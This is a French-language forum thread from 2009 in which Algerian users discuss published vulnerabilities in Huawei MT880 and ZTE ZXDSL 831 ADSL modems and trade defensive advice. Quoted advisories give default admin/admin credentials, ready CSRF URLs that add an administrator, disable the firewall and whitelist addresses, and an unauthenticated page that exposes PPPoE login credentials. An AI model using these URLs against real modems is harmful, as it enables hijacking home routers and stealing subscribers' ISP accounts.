Aller au contenu
Règlement du forum ×
IPTV et arnaques ×

Vulnérabilité modem fawri


strongh

Messages recommandés

Bonsoir

 

J'ai trouvé par hasard ce sujet sur le site milworm.com concernant une vulnérabilité sur nos modems Fawri MT880, ya t il quelqu'un qui peut m'expliquer cette vulnérabilité.

 

 

Description:

Huawei MT880 is a device offered by the algerian telecom operator -

FAWRI, to provide ADSL Internet connexion and it's already widely in use.

Overview:

Huawei MT880 firmware and its default configuration has flaws, which

allows LAN users to gain unauthorized full access to device.

 

Here are just limited PoCs.

 

Default credentials on the web-based management interface:

 

admin/admin

 

Possible XSRFs:

 

Adding an administrator user:

http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

 

 

Disabling firewall/anti-DoS... features:

http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

 

 

Adding a MAC address to the whitelist:

http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

 

 

Adding an IP address allowed by the firewall:

http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

 

 

Over flaws are not covered in this advisory.

 

Cheers

/JA

 

# milw0rm.com [2009-08-24]

Lien vers le commentaire
Partager sur d’autres sites

  • Réponses 64
  • Created
  • Dernière réponse

Merci pour l'info.

 

Entre nous, les modems sont fournis avec le mot de passe par défaut n'est ce pas ? admin:admin

 

Et ce n'est pas tout le monde qui est connaisseur en la matière, n'est ce pas ? Donc une grande majorité des possesseurs de ces modems sont vulnérables à moins qu'une mise à jour du firmware verra le jour ou que l'opérateur Algérie Télécom sensibilise ses clients.

Lien vers le commentaire
Partager sur d’autres sites

1) la preumiere pour le Huawei MT880

 

Description:

Huawei MT880 is a device offered by the algerian telecom operator -

FAWRI, to provide ADSL Internet connexion and it's already widely in use.

Overview:

Huawei MT880 firmware and its default configuration has flaws, which

allows LAN users to gain unauthorized full access to device.

 

Here are just limited PoCs.

 

Default credentials on the web-based management interface:

 

admin/admin

 

Possible XSRFs:

 

Adding an administrator user:

http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

 

 

Disabling firewall/anti-DoS... features:

http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

 

 

Adding a MAC address to the whitelist:

http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

 

 

Adding an IP address allowed by the firewall:

http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

 

 

Over flaws are not covered in this advisory.

 

Cheers

/JA

 

# milw0rm.com [2009-08-24]

 

2) la deuxieme pour le ZXDSL 831

 

-----------------------------------------------------

-->> Found By SuNHouSe2 [ALGERIAN HaCkEr]

--> Made in "Maghnia City" (DZ)

--> Contact : sunhouse2@yahoo.com

--> Greetz to : His0k4 all my friends

--> Good Ramadan to all muslims

-----------------------------------------------------

 

Exploit tested on modem with this informations :

 

ZTE CORPORATION

 

Date : NOV 2008

Product : ADSL Modem

Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG

Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV

 

-----------------------------------------------------

Introduction:

 

This modem is used by many providers in the world like

russia india and algeria [used by provider and all clients of "Easy ADSL"].

 

Exploit :

We can get access to to configuration of the modem , and get PPPOE user & password.

 

Go only here

http://192.168.1.1/vpivci.cgi

 

A video uploaded to explain how we can use this exploit to get PPPOE sessions

with user & password

 

download video demonstration >

 

http://www.geeksecurity.org/vid/zxdsl%20exploit.rar

http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar

 

------------------------------------------------------

 

# milw0rm.com [2009-08-18]

Modifié par abitaf
Lien vers le commentaire
Partager sur d’autres sites

Et ce n'est pas tout le monde qui est connaisseur en la matière, n'est ce pas ? Donc une grande majorité des possesseurs de ces modems sont vulnérables à moins qu'une mise à jour du firmware verra le jour ou que l'opérateur Algérie Télécom sensibilise ses clients.

 

Je ne vois pas en quoi une mise à jour du firmware corrigera cela puisqu'il ne s'agit pas d'une faille mais des identifiants par défauts, les liens qui sont cités ne sont que les liens des scripts de l'interface admin du modem, on peut pas y accéder directement sans s'identifier.

 

L'unique solution serait une génération d'identifiant par défaut pour chaque client lors de la remise du modem.

Lien vers le commentaire
Partager sur d’autres sites

si je comprend bien,

 

a la place de l'adresse 192.168.1.1 on va mettre une plage ip de l'opérateur fawri ( après scanne de l'adresse ip ) et on peut accédé au modem d'un utilisateur dans le cas ou se dernier na pas changer son mot de passe . !!!! ???

 

imho, le port 23 n'est disponible qu'a partir du lan

Lien vers le commentaire
Partager sur d’autres sites

Je ne trouve pas que c'est une faille puisqu'il faut être connecté en tant qu'admin pour pouvoir mettre ces paramètres.Ce Jérôme n'a fait que donner le lien direct pour faire les manipulations.

 

si je comprend bien,

 

a la place de l'adresse 192.168.1.1 on va mettre une plage ip de l'opérateur fawri ( après scanne de l'adresse ip ) et on peut accédé au modem d'un utilisateur dans le cas ou se dernier na pas changer son mot de passe . !!!! ???

C'est impossible si le firewall du modem est activé (J'espère qu'il en possède un !).

Lien vers le commentaire
Partager sur d’autres sites

C'est impossible si le firewall du modem est activé (J'espère qu'il en possède un !).

 

dans une situation normale, l'accès à l'interface d'administration en web ou en telnet n'est pas possible sur l'interface wan du modem en question (AT) (uniquement à partir de l'interface lan), ce qui n'est pas le cas de certains modems (EE).

 

on peut evisager ceci tres vaguement comme une vulnerabilité si le modem est placé sur un réseau lan dans lequel les utilisateurs ne sont pas dignes de confiance (cyber café?) ou ils pourraient faire joujou avec la configuration (vol des credentiels, quand ils sont gentils)

 

certains constructeurs générent le mot de passe à partir de l'adresse mac (par ex), ou à partir du numero de serie (seul l'acces physique peut fournir l'information), il est vrai que mettre un mot de passe statique d'une telle trivialité n'est pas tres ingenieux.

Lien vers le commentaire
Partager sur d’autres sites

si vous prenez cela comme une faille alors tous les netgear les dlink les cisco les speedtouch sont vulnérables.

cest un raccourci pour les opération de configuration cest tout il te faut le mot de passe ,

pas besoin de changer le firmware, change le mot de passe, puis l'accès depuis le wan au modem est bloqué par défaut. cest un gar qui veut ce montrer cest tout sur (milworm).

Lien vers le commentaire
Partager sur d’autres sites

salam

 

C'EST BIEN DES FAILLES QUI SONT CONNUS DEPUIS ... moi j'avais connaissences de ces failles depuis 1 ou 2 ans, en plus tout les modems ou routeurs avec interface Web sont vulnérables a ces CSRF et XSS et d'authentifications ...

Je confirme que meme les routeurs d'eepad, AT ... etc (tu te souviens un jour ButterflyOfFire sur IRC) sont vulnérables, seulement les mise à jours des firmwares ne sont pas la, alors faut pas donner aux milliers des script kiddies ...

 

Petite synthese (je vais essayer de donner le moins d'info possible):

- il ne s'authentifie pas avec le password.

- il y a un GROOOOOOOOS problème d'authentification, dans ce cas le password n'est vraiment pas utilisé ...

- il y a pleins de failles XSS sur ces routeurs ...

- il y a pleins de failles CSRF (modifier tous les données et configs)

- par le contexte de ces failles ces attaques peuvent parfaitement etre exploité depuis le Wan (internet)

- le chercheur dit que c'est failles sont activé seulement depuis le LAN alors qu'on peut parfaitement le faire depuis le Wan (Internet) si il y a une certaine config et si ...

- ... pleins d'autres ...

 

Conslusion: les gens qui ont pondu ces modems n'ont jamais pensé à l'aspect sécurité et ils sont au courant et ...

 

Protection (rapidement):

- faire une mise à jour du firmware si c'est possible (mais je pense que ce n'est pas possible).

- chager le password.

- configurer la connection depuis votre PC et pas depuis votre Modem (info: password sur PC, IP de connection attribué au PC qui contient un firewall)

- firewall qui filtre l'accée au modem (car l'accée du modem va se faire depuis le PC relié au modem, ce PC fonctionne en mode routeur).

- ne pas consulter des sites Web et des pages Web ou des liens suspects ou que vous ne connaissez pas ...

- peut etre un modem USB est plus pratique (moi j'utilise un ce moment), mais c'est sure qu'ils ont d'autres failles ...

- relire le poste de tewfik.

- ... a suivre

 

en gros voici le conseil de secdz:

- "Ne pas faire confiance à quoique se soit, à commencer par ton PC et ces routeurs"

- "Rester sous la radar et ne pas attirer l'attention"

 

Ma situation qui résume ce que secdz a dit:

à cause de mes petits frères (telechargment de logiciel infécté depuis des sites arabs) j'ai du changé le password plusieurs fois en plus avec leurs attitude ça ne va pas se régler :).

 

@bilmagic:

oui désolé c'est encore moi :), tous ce que tu cite est vulnérable meme ces sisco ...

 

@racNET

hbibi rak jari :)

 

SLVPL si il y a un membre qui à plus de temps que moi, qu'il réorganise mon poste en un nouveau sujet (les sollutions et apporter des nouvelles aussi), vraiment désolé je manque énormément de temps, merci encore.

 

PS: je n'ai jamais exploité ces failles (faut pas nuir aux autres), je ne ferai jamais ça inchallah.

 

 

saha ftourkoum.

Modifié par tixxDZ
Lien vers le commentaire
Partager sur d’autres sites

salam

 

@bilmagic

c'est pas des fouteeeeeeeezzzzzzzz, désolé mais il ne faut pas dire des conneries si on ne maitrise pas.

 

@abitaf

c'est des failles CSRFs et preseque tous les routeurs avec interface Web sont vulnérables. C'est parfaitement exploitable à 100% sans connaitre le password ...

 

concernant le premier (chercheur français):

- il dit que c'est accessible depuis le Lan alors qu'on peut parfaitement (peut etre forger des paquets) accéder depuis le Wan (internet).

- il publie seulement quelques CSRF alors qu'il y a pleins d'autres et encore plus dangereuses (mais il dit qu'il a d'autres).

- il y a pleins d'autres XSS qui peuvent etre stocké sur le modem.

 

concernant le deuxième (chercheur algérien):

- c'est pas des CSRF, c'est un problème d'authentification, si un utilisateur

- l'exploitation est très très simple.

- dans la video le chercheur dis que le password est crypté => c'est faux, ce n'est qu'un simple encodage.

- l'exploitation est très très simple.

 

PS: désolé abitaf mais peut etre que ton poste est hors charte, faut effacer.

 

 

@ktalgerie

si tu fais allusion à moi, alors normalement je ne publie pas ce genre de faille et surtout sur milw0rm (c'est des trucs qui seront utilisé par des scripts kiddies et qui vont faire du mal à d'autres), je publie seulement si l'exploitation ou le PoF est cool (challenge) sinon pas besoin je vais simplement perdre plus de temps.

 

PS: mon vrai nom est djalal :) et c'est pas moi qui a publié, bon rétablissement KT inchallah.

 

 

je poste seulement pour signaler, je ne vais pas dire plus, comment se protéger et bien consulter ce topic "http://www.forumdz.com/showthread.php?t=16854&page=2", merci encore pour votre lecture.

 

saha ftourkoum.

Modifié par tixxDZ
Lien vers le commentaire
Partager sur d’autres sites

Adding an administrator user:

http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

 

 

Disabling firewall/anti-DoS... features:

http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

 

 

Adding a MAC address to the whitelist:

http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

 

 

Adding an IP address allowed by the firewall:

http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

 

 

Over flaws are not covered in this advisory.

 

Cheers

/JA

 

# milw0rm.com [2009-08-24]

 

Elle est où la faille ici ? Les identifiants sont inclus à l'URL... on voit bien que l'utilisateur ADMIN accède au routeur (192.168.1.1) avec le mot de passe ADMIN. C'est grossomodo un appel direct des scripts mais cela n'outre passe pas l'authentification.

 

Il suffit de personnaliser les identifiants de son routeur pour éviter ce problème.

Lien vers le commentaire
Partager sur d’autres sites

Perso j'ai pas trop pigé, les identifiants sont bien controlés non? le admin admin c'est la valeur par defaut... est ce que ces méthode marche sur un routeur dont les identifiants ont été personnalisés ?

Lien vers le commentaire
Partager sur d’autres sites

Perso j'ai pas trop pigé, les identifiants sont bien controlés non? le admin admin c'est la valeur par defaut... est ce que ces méthode marche sur un routeur dont les identifiants ont été personnalisés ?

 

Je ne pense pas non. ça ne marche que sur des routeurs dont les identifiants sont ceux par défauts (admin/admin) ;)

Lien vers le commentaire
Partager sur d’autres sites

Authentification ou pas, tout lien vers une application Web pouvant modifier directement la config sans confirmation est considéré comme faille CSRF :) Et concernant les mots de passe par défaut des routeurs je t'assure que 99% des algériens les laissent !

 

pour cette faille sera accomplie il faut que l'utilisateur est complice sans en être conscient.

par exemple si tu veux changer ou obtenir quelque configs de mon modem il faut que

tu connaisse monn ip

je te fais confiance

j'execute un script, je charge une image ... de votre part

si j'ai modifié mon mot de passe alors ton attaque réussit que lorsque je suis déja authentifié

.

Lien vers le commentaire
Partager sur d’autres sites

Rejoindre la conversation

Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.


  • Messages

    • Internet a vraiment simplifié les choses pour tous. Faire ses courses et payer à distance, effectuer ses opérations bancaires et se former sont désormais à portée de main. Mais la facilité d'accès comporte des risques. De nombreux sites web suspects sont aujourd'hui en ligne, peu sûrs et en quête de vos données personnelles. On cherche même à usurper votre identité , d'autres veulent votre compte bancaire . Certains navigateurs modernes se pré-occupent sérieusement de la sécurité , d'autres peuvent être  affiliés à des régies publicitaires , des entités étatiques ou  aux GAFAM Puis-je faire confiance à ce site ? Ce que vous devez savoir Tous les sites ne sont pas fiables. Certaines personnes en ligne recherchent vos informations personnelles ; soyez donc prudent quant à ce que vous partagez et à l'endroit où vous le faites. Voici quelques conseils utiles pour vous aider à prendre une décision éclairée quant à savoir si un site est digne de confiance ou non. Âge du domaine L'âge du domaine peut vous donner une idée de la fiabilité d'un site. C’est parce que généralement les sites Web qui existent depuis longtemps doivent avoir fait quelque chose de bien pour être toujours en activité. Il convient toutefois de noter que certains propriétaires de sites peuvent acheter des domaines anciens dans le but d'essayer de tromper les gens en leur faisant croire qu'ils sont en activité depuis longtemps. L'âge du domaine à lui seul ne suffit donc pas à confirmer si un site est digne de confiance ou non. Expiration du domaine La date d'enregistrement d'un domaine indique la date à laquelle il a été enregistré et sa date d'expiration indique sa date d'expiration. La date d'expiration d'un domaine peut vous donner une idée de la sécurité du site. Les fraudeurs ont tendance à changer régulièrement de domaine, ce qui peut les empêcher de durer longtemps. Ils peuvent simplement créer des sites à court terme sur différents domaines et les utiliser à des fins frauduleuses. Vous pouvez ainsi vérifier quand le domaine a été enregistré et quand il doit expirer pour vous donner une idée si le propriétaire envisage de rester en activité pendant longtemps ou simplement de s'installer pendant une courte période pour passer à autre chose une fois ses activités illégitimes exposées. Détails WHOIS Consultez les informations WHOIS pour connaître les détails de l'enregistrement du domaine. Les informations WHOIS révèlent généralement les coordonnées, ou au moins le pays, du propriétaire du domaine, ce qui vous permet de vérifier son identité. Il est important de noter que certaines personnes utilisent la confidentialité du domaine ou du WHOIS pour masquer leurs coordonnées, vous empêchant ainsi d'accéder à leurs informations. Cela vaut néanmoins la peine d'essayer. Navigation sécurisée Assurez-vous que le site que vous consultez est sécurisé. Les sites sécurisés utilisent généralement le protocole HTTPS et disposent d'un certificat SSL/TLS valide. Ce certificat permet de chiffrer les données et de protéger vos informations personnelles. Pour vérifier que le site possède ce certificat, recherchez l'icône de cadenas dans la barre d'adresse. Assurez-vous également que l'URL commence par « https ». Conception et contenu professionnels En général, un site qui fait des affaires légitimes s'assurera d'avoir un design professionnel et ne plaisantera pas avec son bon contenu. Une fois que vous voyez un site avec de mauvaises images, une grammaire médiocre et de nombreuses fautes d'orthographe, vous savez que quelque chose ne va pas. Cela ne le rend pas dangereux, mais cela montre qu'il n'est pas bien géré. Soyez prudent lorsque vous visitez de tels sites. Avertissements concernant les logiciels malveillants et le phishing Utilisez des navigateurs sécurisés et des outils de sécurité en ligne qui fournissent des alertes contre les logiciels malveillants et le phishing. Soyez attentif à ces avertissements, car ils peuvent vous aider à identifier les menaces potentielles et vous indiquer si un site web est sûr ou non. Politique de confidentialité et conditions d'utilisation Les sites légitimes ont toujours une politique de confidentialité claire et concise, ainsi que des conditions d'utilisation claires. Ils vous informent également des types de cookies qu'ils utilisent et de l'utilisation qu'ils font des informations publiées sur leurs sites. Avis et notes des utilisateurs Découvrez ce que les autres disent de votre site. Consultez différentes plateformes en ligne pour consulter les avis de personnes ayant utilisé le service ou acheté le produit qui vous intéresse. Méfiez-vous des faux avis et soyez attentif aux signaux d'alarme, comme les avis qui se ressemblent, car les propriétaires de sites se font souvent passer pour des utilisateurs et publient eux-mêmes des avis sur leurs sites. Certains paient même des tiers pour leur donner de bons avis. Assurez-vous que les avis sont détaillés et sensés et n'oubliez pas de comparer les avis de différentes plateformes. Coordonnées Les sites légitimes n'ont rien à cacher et fournissent donc des coordonnées claires et légitimes. Celles-ci incluent généralement l'adresse, le numéro de téléphone et l'adresse e-mail. Service client Les sites professionnels sont toujours sérieux envers leurs clients et offrent donc un excellent service client. Les sites qui rendent difficile l'accès en cas de problème ne sont certainement pas dignes de confiance. Conclusion Bien que les conseils ci-dessus devraient vous aider à mieux décider si un site est fiable ou non, ils ne sont qu'une indication. Certains sites peuvent ne pas présenter certains des éléments mentionnés ci-dessus tout en étant sûrs et fiables. D'autres sites peuvent remplir certaines conditions tout en présentant un risque.
    • lyes...nimporte qui peut ouvrir un compte....mais il ne sert a rien sauf s'il est confirmé/verifié....et on fait cela avec une procedure....normalement tu sais ca...toute les "banques" fonctionnent comme ca....
    • je vois...je dois donc faire un test reel...et on verra... preuve en est que toute l'algerie...et le monde CONFIRME qu'il faut une carte debit/iban pour confirmer le compte....or j'ai confirmé ca avec juste un ID.... toute la terre s'est trompée ? on dirait bien vu que meme dans paypal cette info n'est pas explicite...
    • Pour ma part, les techniciens sont passés aujourd’hui pour installer la ligne, mais il n’y a pas encore de connexion internet. Edit : fallait juste activé une carte j'ai cru qu'il allait transfer le solde de jours directement 
×
×
  • Créer...